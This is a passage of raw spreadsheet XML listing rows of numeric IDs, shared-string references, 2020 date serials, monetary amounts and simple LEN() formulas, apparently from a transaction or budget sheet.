    </row>
    <row r="1178" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1178">
        <v>20415</v>
      </c>
      <c r="B1178">
        <v>163</v>
      </c>
      <c r="C1178" t="s">
        <v>807</v>
      </c>
      <c r="D1178" t="s">
        <v>10574</v>
      </c>
      <c r="E1178">
        <v>14</v>
      </c>
      <c r="F1178" t="s">
        <v>10693</v>
      </c>
      <c r="G1178" s="1">
        <v>43987</v>
      </c>
      <c r="H1178">
        <v>15000</v>
      </c>
      <c r="J1178" t="s">
        <v>9478</v>
      </c>
      <c r="K1178">
        <f>LEN(I1178)</f>
        <v>0</v>
      </c>
      <c r="L1178">
        <f>LEN(J1178)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1179" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1179">
        <v>20416</v>
      </c>
      <c r="B1179">
        <v>163</v>
      </c>
      <c r="C1179" t="s">
        <v>807</v>
      </c>
      <c r="D1179" t="s">
        <v>10574</v>
      </c>
      <c r="E1179">
        <v>14</v>
      </c>
      <c r="F1179" t="s">
        <v>10694</v>
      </c>
      <c r="G1179" s="1">
        <v>43990</v>
      </c>
      <c r="H1179">
        <v>96000</v>
      </c>
      <c r="J1179" t="s">
        <v>9478</v>
      </c>
      <c r="K1179">
        <f>LEN(I1179)</f>
        <v>0</v>
      </c>
      <c r="L1179">
        <f>LEN(J1179)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1180" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1180">
        <v>20421</v>
      </c>
      <c r="B1180">
        <v>244</v>
      </c>
      <c r="C1180" t="s">
        <v>16346</v>
      </c>
      <c r="D1180" t="s">
        <v>16347</v>
      </c>
      <c r="E1180">
        <v>16</v>
      </c>
      <c r="F1180" t="s">
        <v>10695</v>
      </c>
      <c r="G1180" s="1">
        <v>43977</v>
      </c>
      <c r="H1180" s="4">
        <v>350000</v>
      </c>
      <c r="J1180" t="s">
        <v>9456</v>
      </c>
      <c r="K1180">
        <f>LEN(I1180)</f>
        <v>0</v>
      </c>
      <c r="L1180">
        <f>LEN(J1180)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1181" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1181">
        <v>20422</v>
      </c>
      <c r="B1181">
        <v>244</v>
      </c>
      <c r="C1181" t="s">
        <v>16346</v>
      </c>
      <c r="D1181" t="s">
        <v>16347</v>
      </c>
      <c r="E1181">
        <v>16</v>
      </c>
      <c r="F1181" t="s">
        <v>10696</v>
      </c>
      <c r="G1181" s="1">
        <v>43977</v>
      </c>
      <c r="H1181" s="4">
        <v>350000</v>
      </c>
      <c r="J1181" t="s">
        <v>9456</v>
      </c>
      <c r="K1181">
        <f>LEN(I1181)</f>
        <v>0</v>
      </c>
      <c r="L1181">
        <f>LEN(J1181)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1182" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1182">
        <v>20424</v>
      </c>
      <c r="B1182">
        <v>244</v>
      </c>
      <c r="C1182" t="s">
        <v>16346</v>
      </c>
      <c r="D1182" t="s">
        <v>16347</v>
      </c>
      <c r="E1182">
        <v>16</v>
      </c>
      <c r="F1182" t="s">
        <v>1746</v>
      </c>
      <c r="G1182" s="1">
        <v>43977</v>
      </c>
      <c r="H1182" s="4">
        <v>350000</v>
      </c>
      <c r="J1182" t="s">
        <v>9456</v>
      </c>
      <c r="K1182">
        <f>LEN(I1182)</f>
        <v>0</v>
      </c>
      <c r="L1182">
        <f>LEN(J1182)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1183" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1183">
        <v>20425</v>
      </c>
      <c r="B1183">
        <v>244</v>
      </c>
      <c r="C1183" t="s">
        <v>16346</v>
      </c>
      <c r="D1183" t="s">
        <v>16347</v>
      </c>
      <c r="E1183">
        <v>16</v>
      </c>
      <c r="F1183" t="s">
        <v>10697</v>
      </c>
      <c r="G1183" s="1">
        <v>43977</v>
      </c>
      <c r="H1183" s="4">
        <v>250000</v>
      </c>
      <c r="J1183" t="s">
        <v>9456</v>
      </c>
      <c r="K1183">
        <f>LEN(I1183)</f>
        <v>0</v>
      </c>
      <c r="L1183">
        <f>LEN(J1183)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1184" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1184">
        <v>20429</v>
      </c>
      <c r="B1184">
        <v>217</v>
      </c>
      <c r="C1184" t="s">
        <v>817</v>
      </c>
      <c r="D1184" t="s">
        <v>10702</v>
      </c>
      <c r="E1184">
        <v>16</v>
      </c>
      <c r="F1184" t="s">
        <v>1455</v>
      </c>
      <c r="G1184" s="1">
        <v>44081</v>
      </c>
      <c r="H1184">
        <v>1200000</v>
      </c>
      <c r="J1184" t="s">
        <v>9478</v>
      </c>
      <c r="K1184">
        <f>LEN(I1184)</f>
        <v>0</v>
      </c>
      <c r="L1184">
        <f>LEN(J1184)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1185" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1185">
        <v>20548</v>
      </c>
      <c r="B1185">
        <v>2107</v>
      </c>
      <c r="C1185" t="s">
        <v>5856</v>
      </c>
      <c r="D1185" t="s">
        <v>10795</v>
      </c>
      <c r="E1185">
        <v>16</v>
      </c>
      <c r="F1185" t="s">
        <v>364</v>
      </c>
      <c r="G1185" s="1">
        <v>43963</v>
      </c>
      <c r="H1185">
        <v>1080000</v>
      </c>
      <c r="J1185" t="s">
        <v>9456</v>
      </c>
      <c r="K1185">
        <f>LEN(I1185)</f>
        <v>0</v>
      </c>
      <c r="L1185">
        <f>LEN(J1185)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1186" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1186">
        <v>20598</v>
      </c>
      <c r="B1186">
        <v>882</v>
      </c>
      <c r="C1186" t="s">
        <v>2992</v>
      </c>
      <c r="D1186" t="s">
        <v>10834</v>
      </c>
      <c r="E1186">
        <v>2</v>
      </c>
      <c r="F1186" t="s">
        <v>9437</v>
      </c>
      <c r="G1186" s="1">
        <v>43991</v>
      </c>
      <c r="H1186">
        <v>15260</v>
      </c>
      <c r="J1186" t="s">
        <v>10252</v>
      </c>
      <c r="K1186">
        <f>LEN(I1186)</f>
        <v>0</v>
      </c>
      <c r="L1186">
        <f>LEN(J1186)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1187" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1187">
        <v>20599</v>
      </c>
      <c r="B1187">
        <v>882</v>
      </c>
      <c r="C1187" t="s">
        <v>2992</v>
      </c>
      <c r="D1187" t="s">
        <v>10834</v>
      </c>
      <c r="E1187">
        <v>2</v>
      </c>
      <c r="F1187" t="s">
        <v>10837</v>
      </c>
      <c r="G1187" s="1">
        <v>43991</v>
      </c>
      <c r="H1187">
        <v>25870</v>
      </c>
      <c r="J1187" t="s">
        <v>10677</v>
      </c>
      <c r="K1187">
        <f>LEN(I1187)</f>
        <v>0</v>
      </c>
      <c r="L1187">
        <f>LEN(J1187)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1188" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1188">
        <v>20600</v>
      </c>
      <c r="B1188">
        <v>709</v>
      </c>
      <c r="C1188" t="s">
        <v>16362</v>
      </c>
      <c r="D1188" t="s">
        <v>16363</v>
      </c>
      <c r="E1188">
        <v>31</v>
      </c>
      <c r="F1188" t="s">
        <v>10838</v>
      </c>
      <c r="G1188" s="1">
        <v>43943</v>
      </c>
      <c r="H1188" s="4">
        <v>100000</v>
      </c>
      <c r="J1188" t="s">
        <v>9478</v>
      </c>
      <c r="K1188">
        <f>LEN(I1188)</f>
        <v>0</v>
      </c>
      <c r="L1188">
        <f>LEN(J1188)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1189" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1189">
        <v>20628</v>
      </c>
      <c r="B1189">
        <v>603</v>
      </c>
      <c r="C1189" t="s">
        <v>1137</v>
      </c>
      <c r="D1189" t="s">
        <v>10855</v>
      </c>
      <c r="E1189">
        <v>16</v>
      </c>
      <c r="F1189" t="s">
        <v>1139</v>
      </c>
      <c r="G1189" s="1">
        <v>44039</v>
      </c>
      <c r="H1189">
        <v>70000</v>
      </c>
      <c r="J1189" t="s">
        <v>9456</v>
      </c>
      <c r="K1189">
        <f>LEN(I1189)</f>
        <v>0</v>
      </c>
      <c r="L1189">
        <f>LEN(J1189)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1190" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1190">
        <v>20696</v>
      </c>
      <c r="B1190">
        <v>758</v>
      </c>
      <c r="C1190" t="s">
        <v>998</v>
      </c>
      <c r="D1190" t="s">
        <v>10899</v>
      </c>
      <c r="E1190">
        <v>30</v>
      </c>
      <c r="F1190" t="s">
        <v>10900</v>
      </c>
      <c r="G1190" s="1">
        <v>44075</v>
      </c>
      <c r="H1190">
        <v>60000</v>
      </c>
      <c r="J1190" t="s">
        <v>9478</v>
      </c>
      <c r="K1190">
        <f>LEN(I1190)</f>
        <v>0</v>
      </c>
      <c r="L1190">
        <f>LEN(J1190)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1191" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1191">
        <v>20697</v>
      </c>
      <c r="B1191">
        <v>758</v>
      </c>
      <c r="C1191" t="s">
        <v>998</v>
      </c>
      <c r="D1191" t="s">
        <v>10899</v>
      </c>
      <c r="E1191">
        <v>30</v>
      </c>
      <c r="F1191" t="s">
        <v>10901</v>
      </c>
      <c r="G1191" s="1">
        <v>44075</v>
      </c>
      <c r="H1191">
        <v>150000</v>
      </c>
      <c r="J1191" t="s">
        <v>9478</v>
      </c>
      <c r="K1191">
        <f>LEN(I1191)</f>
        <v>0</v>
      </c>
      <c r="L1191">
        <f>LEN(J1191)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1192" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1192">
        <v>20698</v>
      </c>
      <c r="B1192">
        <v>758</v>
      </c>
      <c r="C1192" t="s">
        <v>998</v>
      </c>
      <c r="D1192" t="s">
        <v>10899</v>
      </c>
      <c r="E1192">
        <v>30</v>
      </c>
      <c r="F1192" t="s">
        <v>9610</v>
      </c>
      <c r="G1192" s="1">
        <v>44075</v>
      </c>
      <c r="H1192">
        <v>10000</v>
      </c>
      <c r="J1192" t="s">
        <v>9478</v>
      </c>
      <c r="K1192">
        <f>LEN(I1192)</f>
        <v>0</v>
      </c>
      <c r="L1192">
        <f>LEN(J1192)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1193" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1193">
        <v>20699</v>
      </c>
      <c r="B1193">
        <v>758</v>
      </c>
      <c r="C1193" t="s">
        <v>998</v>
      </c>
      <c r="D1193" t="s">
        <v>10899</v>
      </c>
      <c r="E1193">
        <v>30</v>
      </c>
      <c r="F1193" t="s">
        <v>9546</v>
      </c>
      <c r="G1193" s="1">
        <v>44075</v>
      </c>
      <c r="H1193">
        <v>10000</v>
      </c>
      <c r="J1193" t="s">
        <v>9478</v>
      </c>
      <c r="K1193">
        <f>LEN(I1193)</f>
        <v>0</v>
      </c>
      <c r="L1193">
        <f>LEN(J1193)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1194" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1194">
        <v>20744</v>
      </c>
      <c r="B1194">
        <v>256</v>
      </c>
      <c r="C1194" t="s">
        <v>1009</v>
      </c>
      <c r="D1194" t="s">
        <v>10953</v>
      </c>
      <c r="E1194">
        <v>16</v>
      </c>
      <c r="F1194" t="s">
        <v>9523</v>
      </c>
      <c r="G1194" s="1">
        <v>43971</v>
      </c>
      <c r="H1194">
        <v>10000</v>
      </c>
      <c r="J1194" t="s">
        <v>9478</v>
      </c>
      <c r="K1194">
        <f>LEN(I1194)</f>
        <v>0</v>
      </c>
      <c r="L1194">
        <f>LEN(J1194)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1195" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1195">
        <v>20765</v>
      </c>
      <c r="B1195">
        <v>2562</v>
      </c>
      <c r="C1195" t="s">
        <v>4285</v>
      </c>
      <c r="D1195" t="s">
        <v>10805</v>
      </c>
      <c r="E1195">
        <v>13</v>
      </c>
      <c r="F1195" t="s">
        <v>10963</v>
      </c>
      <c r="G1195" s="1">
        <v>43956</v>
      </c>
      <c r="H1195">
        <v>940</v>
      </c>
      <c r="J1195" t="s">
        <v>9478</v>
      </c>
      <c r="K1195">
        <f>LEN(I1195)</f>
        <v>0</v>
      </c>
      <c r="L1195">
        <f>LEN(J1195)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1196" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1196">
        <v>20770</v>
      </c>
      <c r="B1196">
        <v>235</v>
      </c>
      <c r="C1196" t="s">
        <v>486</v>
      </c>
      <c r="D1196" t="s">
        <v>10198</v>
      </c>
      <c r="E1196">
        <v>16</v>
      </c>
      <c r="F1196" t="s">
        <v>10969</v>
      </c>
      <c r="G1196" s="1">
        <v>43937</v>
      </c>
      <c r="H1196">
        <v>1590000</v>
      </c>
      <c r="J1196" t="s">
        <v>9478</v>
      </c>
      <c r="K1196">
        <f>LEN(I1196)</f>
        <v>0</v>
      </c>
      <c r="L1196">
        <f>LEN(J1196)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1197" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1197">
        <v>20773</v>
      </c>
      <c r="B1197">
        <v>671</v>
      </c>
      <c r="C1197" t="s">
        <v>1221</v>
      </c>
      <c r="D1197" t="s">
        <v>10970</v>
      </c>
      <c r="E1197">
        <v>26</v>
      </c>
      <c r="F1197" t="s">
        <v>2236</v>
      </c>
      <c r="G1197" s="1">
        <v>44048</v>
      </c>
      <c r="H1197">
        <v>336000</v>
      </c>
      <c r="J1197" t="s">
        <v>9478</v>
      </c>
      <c r="K1197">
        <f>LEN(I1197)</f>
        <v>0</v>
      </c>
      <c r="L1197">
        <f>LEN(J1197)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1198" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1198">
        <v>20774</v>
      </c>
      <c r="B1198">
        <v>671</v>
      </c>
      <c r="C1198" t="s">
        <v>1221</v>
      </c>
      <c r="D1198" t="s">
        <v>10970</v>
      </c>
      <c r="E1198">
        <v>26</v>
      </c>
      <c r="F1198" t="s">
        <v>4686</v>
      </c>
      <c r="G1198" s="1">
        <v>44048</v>
      </c>
      <c r="H1198">
        <v>15000</v>
      </c>
      <c r="J1198" t="s">
        <v>9478</v>
      </c>
      <c r="K1198">
        <f>LEN(I1198)</f>
        <v>0</v>
      </c>
      <c r="L1198">
        <f>LEN(J1198)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1199" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1199">
        <v>20793</v>
      </c>
      <c r="B1199">
        <v>2734</v>
      </c>
      <c r="C1199" t="s">
        <v>6018</v>
      </c>
      <c r="D1199" t="s">
        <v>10661</v>
      </c>
      <c r="E1199">
        <v>14</v>
      </c>
      <c r="F1199" t="s">
        <v>10985</v>
      </c>
      <c r="G1199" s="1">
        <v>44048</v>
      </c>
      <c r="H1199">
        <v>300</v>
      </c>
      <c r="J1199" t="s">
        <v>9478</v>
      </c>
      <c r="K1199">
        <f>LEN(I1199)</f>
        <v>0</v>
      </c>
      <c r="L1199">
        <f>LEN(J1199)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1200" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1200">
        <v>20799</v>
      </c>
      <c r="B1200">
        <v>473</v>
      </c>
      <c r="C1200" t="s">
        <v>1243</v>
      </c>
      <c r="D1200" t="s">
        <v>10987</v>
      </c>
      <c r="E1200">
        <v>26</v>
      </c>
      <c r="F1200" t="s">
        <v>5434</v>
      </c>
      <c r="G1200" s="1">
        <v>44075</v>
      </c>
      <c r="H1200">
        <v>60000</v>
      </c>
      <c r="J1200" t="s">
        <v>9456</v>
      </c>
      <c r="K1200">
        <f>LEN(I1200)</f>
        <v>0</v>
      </c>
      <c r="L1200">
        <f>LEN(J1200)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1201" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1201">
        <v>20863</v>
      </c>
      <c r="B1201">
        <v>1028</v>
      </c>
      <c r="C1201" t="s">
        <v>16364</v>
      </c>
      <c r="D1201" t="s">
        <v>16365</v>
      </c>
      <c r="E1201">
        <v>16</v>
      </c>
      <c r="F1201" t="s">
        <v>9437</v>
      </c>
      <c r="G1201" s="1">
        <v>44013</v>
      </c>
      <c r="H1201" s="4">
        <v>240000</v>
      </c>
      <c r="J1201" t="s">
        <v>9456</v>
      </c>
      <c r="K1201">
        <f>LEN(I1201)</f>
        <v>0</v>
      </c>
      <c r="L1201">
        <f>LEN(J1201)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1202" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1202">
        <v>20864</v>
      </c>
      <c r="B1202">
        <v>229</v>
      </c>
      <c r="C1202" t="s">
        <v>1282</v>
      </c>
      <c r="D1202" t="s">
        <v>11042</v>
      </c>
      <c r="E1202">
        <v>16</v>
      </c>
      <c r="F1202" t="s">
        <v>1746</v>
      </c>
      <c r="G1202" s="1">
        <v>44039</v>
      </c>
      <c r="H1202">
        <v>432000</v>
      </c>
      <c r="J1202" t="s">
        <v>9478</v>
      </c>
      <c r="K1202">
        <f>LEN(I1202)</f>
        <v>0</v>
      </c>
      <c r="L1202">
        <f>LEN(J1202)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1203" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1203">
        <v>20865</v>
      </c>
      <c r="B1203">
        <v>229</v>
      </c>
      <c r="C1203" t="s">
        <v>1282</v>
      </c>
      <c r="D1203" t="s">
        <v>11042</v>
      </c>
      <c r="E1203">
        <v>16</v>
      </c>
      <c r="F1203" t="s">
        <v>9441</v>
      </c>
      <c r="G1203" s="1">
        <v>44039</v>
      </c>
      <c r="H1203">
        <v>24000</v>
      </c>
      <c r="J1203" t="s">
        <v>9478</v>
      </c>
      <c r="K1203">
        <f>LEN(I1203)</f>
        <v>0</v>
      </c>
      <c r="L1203">
        <f>LEN(J1203)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1204" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1204">
        <v>20866</v>
      </c>
      <c r="B1204">
        <v>229</v>
      </c>
      <c r="C1204" t="s">
        <v>1282</v>
      </c>
      <c r="D1204" t="s">
        <v>11042</v>
      </c>
      <c r="E1204">
        <v>16</v>
      </c>
      <c r="F1204" t="s">
        <v>10007</v>
      </c>
      <c r="G1204" s="1">
        <v>44039</v>
      </c>
      <c r="H1204">
        <v>48000</v>
      </c>
      <c r="J1204" t="s">
        <v>9478</v>
      </c>
      <c r="K1204">
        <f>LEN(I1204)</f>
        <v>0</v>
      </c>
      <c r="L1204">
        <f>LEN(J1204)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1205" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1205">
        <v>20947</v>
      </c>
      <c r="B1205">
        <v>2335</v>
      </c>
      <c r="C1205" t="s">
        <v>6078</v>
      </c>
      <c r="D1205" t="s">
        <v>11069</v>
      </c>
      <c r="E1205">
        <v>12</v>
      </c>
      <c r="F1205" t="s">
        <v>9561</v>
      </c>
      <c r="G1205" s="1">
        <v>44046</v>
      </c>
      <c r="H1205">
        <v>50</v>
      </c>
      <c r="J1205" t="s">
        <v>9456</v>
      </c>
      <c r="K1205">
        <f>LEN(I1205)</f>
        <v>0</v>
      </c>
      <c r="L1205">
        <f>LEN(J1205)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1206" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1206">
        <v>21037</v>
      </c>
      <c r="B1206">
        <v>479</v>
      </c>
      <c r="C1206" t="s">
        <v>1418</v>
      </c>
      <c r="D1206" t="s">
        <v>11111</v>
      </c>
      <c r="E1206">
        <v>16</v>
      </c>
      <c r="F1206" t="s">
        <v>9437</v>
      </c>
      <c r="G1206" s="1">
        <v>44004</v>
      </c>
      <c r="H1206">
        <v>120000</v>
      </c>
      <c r="J1206" t="s">
        <v>9456</v>
      </c>
      <c r="K1206">
        <f>LEN(I1206)</f>
        <v>0</v>
      </c>
      <c r="L1206">
        <f>LEN(J1206)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1207" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1207">
        <v>21038</v>
      </c>
      <c r="B1207">
        <v>479</v>
      </c>
      <c r="C1207" t="s">
        <v>1418</v>
      </c>
      <c r="D1207" t="s">
        <v>11111</v>
      </c>
      <c r="E1207">
        <v>16</v>
      </c>
      <c r="F1207" t="s">
        <v>11112</v>
      </c>
      <c r="G1207" s="1">
        <v>44004</v>
      </c>
      <c r="H1207">
        <v>300000</v>
      </c>
      <c r="J1207" t="s">
        <v>9456</v>
      </c>
      <c r="K1207">
        <f>LEN(I1207)</f>
        <v>0</v>
      </c>
      <c r="L1207">
        <f>LEN(J1207)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1208" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1208">
        <v>21039</v>
      </c>
      <c r="B1208">
        <v>479</v>
      </c>
      <c r="C1208" t="s">
        <v>1418</v>
      </c>
      <c r="D1208" t="s">
        <v>11111</v>
      </c>
      <c r="E1208">
        <v>16</v>
      </c>
      <c r="F1208" t="s">
        <v>11113</v>
      </c>
      <c r="G1208" s="1">
        <v>44004</v>
      </c>
      <c r="H1208">
        <v>180000</v>
      </c>
      <c r="J1208" t="s">
        <v>9456</v>
      </c>
      <c r="K1208">
        <f>LEN(I1208)</f>
        <v>0</v>
      </c>
      <c r="L1208">
        <f>LEN(J1208)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1209" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1209">
        <v>21092</v>
      </c>
      <c r="B1209">
        <v>604</v>
      </c>
      <c r="C1209" t="s">
        <v>1503</v>
      </c>
      <c r="D1209" t="s">
        <v>11132</v>
      </c>
      <c r="E1209">
        <v>27</v>
      </c>
      <c r="F1209" t="s">
        <v>10247</v>
      </c>
      <c r="G1209" s="1">
        <v>44005</v>
      </c>
      <c r="H1209">
        <v>229000</v>
      </c>
      <c r="J1209" t="s">
        <v>9478</v>
      </c>
      <c r="K1209">
        <f>LEN(I1209)</f>
        <v>0</v>
      </c>
      <c r="L1209">
        <f>LEN(J1209)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1210" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1210">
        <v>21154</v>
      </c>
      <c r="B1210">
        <v>2633</v>
      </c>
      <c r="C1210" t="s">
        <v>5449</v>
      </c>
      <c r="D1210" t="s">
        <v>11178</v>
      </c>
      <c r="E1210">
        <v>26</v>
      </c>
      <c r="F1210" t="s">
        <v>364</v>
      </c>
      <c r="G1210" s="1">
        <v>43994</v>
      </c>
      <c r="H1210">
        <v>10000</v>
      </c>
      <c r="J1210" t="s">
        <v>9456</v>
      </c>
      <c r="K1210">
        <f>LEN(I1210)</f>
        <v>0</v>
      </c>
      <c r="L1210">
        <f>LEN(J1210)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1211" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1211">
        <v>21156</v>
      </c>
      <c r="B1211">
        <v>541</v>
      </c>
      <c r="C1211" t="s">
        <v>1159</v>
      </c>
      <c r="D1211" t="s">
        <v>11179</v>
      </c>
      <c r="E1211">
        <v>16</v>
      </c>
      <c r="F1211" t="s">
        <v>9846</v>
      </c>
      <c r="G1211" s="1">
        <v>44034</v>
      </c>
      <c r="H1211">
        <v>105000</v>
      </c>
      <c r="J1211" t="s">
        <v>9456</v>
      </c>
      <c r="K1211">
        <f>LEN(I1211)</f>
        <v>0</v>
      </c>
      <c r="L1211">
        <f>LEN(J1211)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1212" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1212">
        <v>21163</v>
      </c>
      <c r="B1212">
        <v>541</v>
      </c>
      <c r="C1212" t="s">
        <v>1159</v>
      </c>
      <c r="D1212" t="s">
        <v>11179</v>
      </c>
      <c r="E1212">
        <v>16</v>
      </c>
      <c r="F1212" t="s">
        <v>547</v>
      </c>
      <c r="G1212" s="1">
        <v>44034</v>
      </c>
      <c r="H1212">
        <v>100000</v>
      </c>
      <c r="J1212" t="s">
        <v>9456</v>
      </c>
      <c r="K1212">
        <f>LEN(I1212)</f>
        <v>0</v>
      </c>
      <c r="L1212">
        <f>LEN(J1212)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1213" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1213">
        <v>21165</v>
      </c>
      <c r="B1213">
        <v>541</v>
      </c>
      <c r="C1213" t="s">
        <v>1159</v>
      </c>
      <c r="D1213" t="s">
        <v>11179</v>
      </c>
      <c r="E1213">
        <v>16</v>
      </c>
      <c r="F1213" t="s">
        <v>364</v>
      </c>
      <c r="G1213" s="1">
        <v>44034</v>
      </c>
      <c r="H1213">
        <v>70000</v>
      </c>
      <c r="J1213" t="s">
        <v>9456</v>
      </c>
      <c r="K1213">
        <f>LEN(I1213)</f>
        <v>0</v>
      </c>
      <c r="L1213">
        <f>LEN(J1213)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1214" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1214">
        <v>21167</v>
      </c>
      <c r="B1214">
        <v>541</v>
      </c>
      <c r="C1214" t="s">
        <v>1159</v>
      </c>
      <c r="D1214" t="s">
        <v>11179</v>
      </c>
      <c r="E1214">
        <v>16</v>
      </c>
      <c r="F1214" t="s">
        <v>1139</v>
      </c>
      <c r="G1214" s="1">
        <v>44034</v>
      </c>
      <c r="H1214">
        <v>80000</v>
      </c>
      <c r="J1214" t="s">
        <v>9456</v>
      </c>
      <c r="K1214">
        <f>LEN(I1214)</f>
        <v>0</v>
      </c>
      <c r="L1214">
        <f>LEN(J1214)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1215" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1215">
        <v>21196</v>
      </c>
      <c r="B1215">
        <v>624</v>
      </c>
      <c r="C1215" t="s">
        <v>1453</v>
      </c>
      <c r="D1215" t="s">
        <v>11205</v>
      </c>
      <c r="E1215">
        <v>17</v>
      </c>
      <c r="F1215" t="s">
        <v>1455</v>
      </c>
      <c r="G1215" s="1">
        <v>44034</v>
      </c>
      <c r="H1215">
        <v>720000</v>
      </c>
      <c r="J1215" t="s">
        <v>9478</v>
      </c>
      <c r="K1215">
        <f>LEN(I1215)</f>
        <v>0</v>
      </c>
      <c r="L1215">
        <f>LEN(J1215)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1216" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1216">
        <v>21302</v>
      </c>
      <c r="B1216">
        <v>4788</v>
      </c>
      <c r="C1216" t="s">
        <v>7170</v>
      </c>
      <c r="D1216" t="s">
        <v>11282</v>
      </c>
      <c r="E1216">
        <v>16</v>
      </c>
      <c r="F1216" t="s">
        <v>7172</v>
      </c>
      <c r="G1216" s="1">
        <v>44039</v>
      </c>
      <c r="H1216">
        <v>250</v>
      </c>
      <c r="I1216" t="s">
        <v>11283</v>
      </c>
      <c r="K1216">
        <f>LEN(I1216)</f>
        <v>315</v>
      </c>
      <c r="L1216">
        <f>LEN(J1216)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1217" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1217">
        <v>19582</v>
      </c>
      <c r="B1217">
        <v>2590</v>
      </c>
      <c r="C1217" t="s">
        <v>4375</v>
      </c>
      <c r="D1217" t="s">
        <v>10106</v>
      </c>
      <c r="E1217">
        <v>12</v>
      </c>
      <c r="F1217" t="s">
        <v>1746</v>
      </c>
      <c r="G1217" s="1">
        <v>43865</v>
      </c>
      <c r="H1217">
        <v>150000</v>
      </c>
      <c r="I1217" t="s">
        <v>10107</v>
      </c>
      <c r="K1217">
        <f>LEN(I1217)</f>
        <v>291</v>
      </c>
      <c r="L1217">
        <f>LEN(J1217)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1218" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1218">
        <v>19823</v>
      </c>
      <c r="B1218">
        <v>2617</v>
      </c>
      <c r="C1218" t="s">
        <v>5396</v>
      </c>
      <c r="D1218" t="s">
        <v>10265</v>
      </c>
      <c r="E1218">
        <v>12</v>
      </c>
      <c r="F1218" t="s">
        <v>10266</v>
      </c>
      <c r="G1218" s="1">
        <v>43936</v>
      </c>
      <c r="H1218">
        <v>10000</v>
      </c>
      <c r="I1218" t="s">
        <v>10267</v>
      </c>
      <c r="K1218">
        <f>LEN(I1218)</f>
        <v>291</v>
      </c>
      <c r="L1218">
        <f>LEN(J1218)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1219" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1219">
        <v>19831</v>
      </c>
      <c r="B1219">
        <v>2617</v>
      </c>
      <c r="C1219" t="s">
        <v>5396</v>
      </c>
      <c r="D1219" t="s">
        <v>10265</v>
      </c>
      <c r="E1219">
        <v>12</v>
      </c>
      <c r="F1219" t="s">
        <v>10273</v>
      </c>
      <c r="G1219" s="1">
        <v>43936</v>
      </c>
      <c r="H1219">
        <v>10000</v>
      </c>
